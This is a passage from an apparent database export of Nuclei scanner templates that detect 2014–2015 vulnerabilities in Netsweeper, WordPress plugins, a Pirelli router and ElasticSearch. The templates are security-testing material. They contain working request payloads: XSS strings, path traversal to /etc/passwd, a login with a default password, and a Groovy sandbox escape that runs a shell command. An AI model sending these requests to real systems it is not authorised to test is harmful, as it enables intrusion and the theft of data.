\"{{BaseURL}}/go.php?http://interact.sh\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950", "hash": "bbb32b8a7449762357cd21bb6f7306bc", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f30" }, "name": "CVE-2014-9444.yaml", "content": "id: CVE-2014-9444\n\ninfo:\n name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.\n impact: |\n Allows remote attackers to inject arbitrary web script or HTML via a crafted file name, leading to potential session hijacking, defacement, or data theft.\n remediation: |\n Update to the latest version of the Frontend Uploader plugin (0.9.2) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9444\n - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N\n cvss-score: 4.3\n cve-id: CVE-2014-9444\n cwe-id: CWE-79\n epss-score: 0.00287\n epss-percentile: 0.65501\n cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: frontend_uploader_project\n product: frontend_uploader\n framework: wordpress\n tags: cve2014,cve,wp-plugin,xss,wpscan,packetstorm,wordpress,unauth,frontend_uploader_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d63e192fa95e5914ae00c6a2f55a96eef98aeb85eee3f4171b3af2f9d3e52f6d0220578a283149c3a3345f1443cffed1f5bfee0ea458d32f450beabaebe2500f1e4b:922c64590222798bb761d5b6d8e72950", "hash": "17a4b37049f3df68e4d9ef33e93a143d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f31" }, "name": "CVE-2014-9606.yaml", "content": "id: CVE-2014-9606\n\ninfo:\n name: Netsweeper 4.0.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9606\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9606\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41261\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210080cd960c9becf8e609afed2036ce9d79e616dceacf52cf5865510c5c1f59220b022100d6ab15602efd08d89ec0f184f8f09651aa1a5b71bbae67567e34933901ec3cc9:922c64590222798bb761d5b6d8e72950", "hash": "1650518fed549f2ac264f143fa75466b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f32" }, "name": "CVE-2014-9607.yaml", "content": "id: CVE-2014-9607\n\ninfo:\n name: Netsweeper 4.0.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in remotereporter/load_logfiles.php in Netsweeper 4.0.3 and 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9607\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9607\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.40591\n cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,packetstorm,netsweeper,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950", "hash": "4b53b0eca8547a77a9ee403382dc5de2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f33" }, "name": "CVE-2014-9608.yaml", "content": "id: CVE-2014-9608\n\ninfo:\n name: Netsweeper 4.0.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9608\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9608\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.40591\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - 'webadminU='\n - 'webadmin='\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950", "hash": "bc0902626b83e9e52ee6b92edb593049", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f34" }, "name": "CVE-2014-9609.yaml", "content": "id: CVE-2014-9609\n\ninfo:\n name: Netsweeper 4.0.8 - Directory Traversal\n author: daffainfo\n severity: medium\n description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action.\n impact: |\n An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise.\n remediation: |\n Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9609\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2014-9609\n cwe-id: CWE-22\n epss-score: 0.00153\n epss-percentile: 0.51564\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,lfi,packetstorm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100892f2788bca553f630c6b26ae37681204b18b79f07935ad0067733c4dd4a12d5022028cfe7f92f7ed7a3174ce37145a4c7832af65250a45e5727c3e4443603c9e6ea:922c64590222798bb761d5b6d8e72950", "hash": "6056edb56801e2ad552ae4198d37d339", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f35" }, "name": "CVE-2014-9614.yaml", "content": "id: CVE-2014-9614\n\ninfo:\n name: Netsweeper 4.0.5 - Default Weak Account\n author: daffainfo\n severity: critical\n description: The Web Panel in Netsweeper before 4.0.5 has a default password of 'branding' for the branding account, which makes it easier for remote attackers to obtain access via a request to webadmin/.\n impact: |\n An attacker can gain unauthorized access to the Netsweeper 4.0.5 system using the default weak account.\n remediation: |\n Change the default credentials to strong and unique ones.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9614\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-9614\n cwe-id: CWE-798\n epss-score: 0.01433\n epss-percentile: 0.85223\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,default-login,packetstorm,xss\n\nhttp:\n - raw:\n - |\n POST /webadmin/auth/verification.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}/webadmin/start/\n\n login=branding&password=branding&Submit=Login\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - 'Location: ../common/'\n - 'Location: ../start/'\n condition: or\n\n - type: word\n part: header\n words:\n - 'Set-Cookie: webadminU='\n\n - type: status\n status:\n - 302\n# digest: 4a0a004730450221008ca7c8e2f8971e12c194148bb00ee6af61b7f7402b62a5b0e4b98d020d96eeca0220052a3891b6a4b52003d8e309f5a8c7af3005bbce6e11e69a25f6908273c8bebf:922c64590222798bb761d5b6d8e72950", "hash": "f102340314db87838ada6c3c09261642", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f36" }, "name": "CVE-2014-9615.yaml", "content": "id: CVE-2014-9615\n\ninfo:\n name: Netsweeper 4.0.4 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9615\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9615\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.40591\n cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.4:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname='\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100afdf2fdb6e0145b27c1806b74b05004660dd804acc398f60bd9721b973b0a87002205e93a7b347f6ed674908692a1a6427dd067c9e72cd4c40ed43ea901641042ad7:922c64590222798bb761d5b6d8e72950", "hash": "2d0c85287736b02d856a04089f06825c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f37" }, "name": "CVE-2014-9617.yaml", "content": "id: CVE-2014-9617\n\ninfo:\n name: Netsweeper 3.0.6 - Open Redirection\n author: daffainfo\n severity: medium\n description: An open redirect vulnerability in remotereporter/load_logfiles.php in Netsweeper before 4.0.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the url parameter.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the download of malware.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the open redirection vulnerability.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9617\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2014-9617\n cwe-id: CWE-601\n epss-score: 0.00109\n epss-percentile: 0.43869\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,redirect,packetstorm,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/\"\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$'\n# digest: 490a00463044022006182b3df441f29283ee673c281717eda7a779b431ecc2f9cb6f9a85fd6dfc88022074682e3692cd0985fdc463c552d02b2315af9ba8dd367b8085661de9f9b79108:922c64590222798bb761d5b6d8e72950", "hash": "d0e33d2fb15ba6a069755f5732994bae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f38" }, "name": "CVE-2014-9618.yaml", "content": "id: CVE-2014-9618\n\ninfo:\n name: Netsweeper - Authentication Bypass\n author: daffainfo\n severity: critical\n description: |\n The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the authentication bypass vulnerability in Netsweeper.\n reference:\n - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz\n - https://nvd.nist.gov/vuln/detail/CVE-2014-9618\n - https://www.exploit-db.com/exploits/37933/\n - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2014-9618\n cwe-id: CWE-287\n epss-score: 0.03433\n epss-percentile: 0.90527\n cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: netsweeper\n product: netsweeper\n tags: cve2014,cve,netsweeper,auth-bypass,packetstorm,edb,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"'\n - 'placeholder=\"Profile Manager\">'\n - 'Netsweeper WebAdmin'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220110e65478297a1f1e19a5e98a5f65f7e6bb674ad23a3824ba952a06b72b3736f02210088cd00b58b916cf718bfd03fd71bfd051e0f737bec255d7752bfbf60ff169f36:922c64590222798bb761d5b6d8e72950", "hash": "704e9bf6b20af19c0d7d62b68d607782", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f39" }, "name": "CVE-2015-0554.yaml", "content": "id: CVE-2015-0554\n\ninfo:\n name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure\n author: daffainfo\n severity: critical\n description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information from the router.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/35721\n - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2015-0554\n - http://www.exploit-db.com/exploits/35721\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:C\n cvss-score: 9.4\n cve-id: CVE-2015-0554\n cwe-id: CWE-264\n epss-score: 0.0139\n epss-percentile: 0.86079\n cpe: cpe:2.3:o:adb:p.dga4001n_firmware:pdg_tef_sp_4.06l.6:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: adb\n product: p.dga4001n_firmware\n tags: cve2015,cve,pirelli,router,disclosure,edb,packetstorm,adb\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wlsecurity.html\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"var wpapskkey\"\n - \"var WscDevPin\"\n - \"var sessionkey\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022000e916dda30ee40dc5bdad6723685045a740d238b72ba35fb08f356767409e0f02207ed3256489eeb84f8776c5b31fe38cd30bc00b5e06645fb8e739a43040b27594:922c64590222798bb761d5b6d8e72950", "hash": "e47b331eea3567f9bd6d17c228027509", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3a" }, "name": "CVE-2015-1000005.yaml", "content": "id: CVE-2015-1000005\n\ninfo:\n name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion\n author: dhiyaneshDK\n severity: high\n description: |\n WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server.\n remediation: |\n Update to the latest version of the plugin.\n reference:\n - https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005\n - http://www.vapidlabs.com/advisory.php?v=142\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1000005\n cwe-id: CWE-22\n epss-score: 0.047\n epss-percentile: 0.92455\n cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: candidate-application-form_project\n product: candidate-application-form\n framework: wordpress\n tags: cve2015,cve,wpscan,wordpress,wp-plugin,lfi,wp,candidate-application-form_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950", "hash": "7c0c01653105e6962a2196f2f2b1729e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3b" }, "name": "CVE-2015-1000010.yaml", "content": "id: CVE-2015-1000010\n\ninfo:\n name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion\n author: dhiyaneshDK\n severity: high\n description: |\n WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server.\n remediation: |\n Update to the latest version of the WordPress Simple Image Manipulator plugin.\n reference:\n - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html\n - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1000010\n - http://www.vapidlabs.com/advisory.php?v=147\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1000010\n cwe-id: CWE-284\n epss-score: 0.03171\n epss-percentile: 0.90143\n cpe: cpe:2.3:a:simple-image-manipulator_project:simple-image-manipulator:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: simple-image-manipulator_project\n product: simple-image-manipulator\n framework: wordpress\n tags: cve2015,cve,packetstorm,wpscan,wordpress,wp-plugin,lfi,wp,simple-image-manipulator_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204897681607efd5efa7419b4414d554d537b647ee8f3b82b28b5eb82cbf6b94780220070696d15d7aa49a984ce8ead0fd4ccbaa176cc380998024f33878546e311041:922c64590222798bb761d5b6d8e72950", "hash": "e777216dc040969428eb3a1223d857f9", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3c" }, "name": "CVE-2015-1000012.yaml", "content": "id: CVE-2015-1000012\n\ninfo:\n name: WordPress MyPixs <=0.3 - Local File Inclusion\n author: daffainfo\n severity: high\n description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or gain unauthorized access to the server.\n remediation: |\n Update to the latest version of the MyPixs plugin (>=0.4) or apply the vendor-provided patch to fix the LFI vulnerability.\n reference:\n - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012\n - http://www.vapidlabs.com/advisory.php?v=154\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2015-1000012\n cwe-id: CWE-200\n epss-score: 0.00689\n epss-percentile: 0.79673\n cpe: cpe:2.3:a:mypixs_project:mypixs:0.3:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: mypixs_project\n product: mypixs\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/mypixs\"\n tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,mypixs_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022059a1c4530f87d483652235366963039a278c43e8017648b5e66c1ded53ac1bea0220103c20d421e6f063c7939b78129fffefe71a58c02ec2905ef3b31d3a3d9f29e1:922c64590222798bb761d5b6d8e72950", "hash": "085fb8f34cff4ecd8667f6f5d0ba32ea", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f3d" }, "name": "CVE-2015-1427.yaml", "content": "id: CVE-2015-1427\n\ninfo:\n name: ElasticSearch - Remote Code Execution\n author: pikpikcu\n severity: high\n description: ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by ElasticSearch to fix the deserialization vulnerability.\n reference:\n - https://blog.csdn.net/JiangBuLiu/article/details/94457980\n - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/\n - https://nvd.nist.gov/vuln/detail/CVE-2015-1427\n - http://packetstormsecurity.com/files/130368/Elasticsearch-1.3.7-1.4.2-Sandbox-Escape-Command-Execution.html\n - https://access.redhat.com/errata/RHSA-2017:0868\n classification:\n cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P\n cvss-score: 7.5\n cve-id: CVE-2015-1427\n cwe-id: CWE-284\n epss-score: 0.85974\n epss-percentile: 0.98485\n cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: elasticsearch\n product: elasticsearch\n tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev\n\nhttp:\n - raw:\n - |\n POST /website/blog/ HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Accept-Language: en\n Content-Type: application/x-www-form-urlencoded\n\n {\n \"name\": \"test\"\n }\n - |\n POST /_search HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n Content-Type: application/x-www-form-urlencoded\n\n {\"size\":1, \"script_fields\": {\"lupin\":{\"lang\":\"groovy\",\"script\": \"java.lang.Math.class.forName(\\\"java.lang.Runtime\\\").getRuntime().exec(\\\"cat /etc/passwd\\\").getText()\"}}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 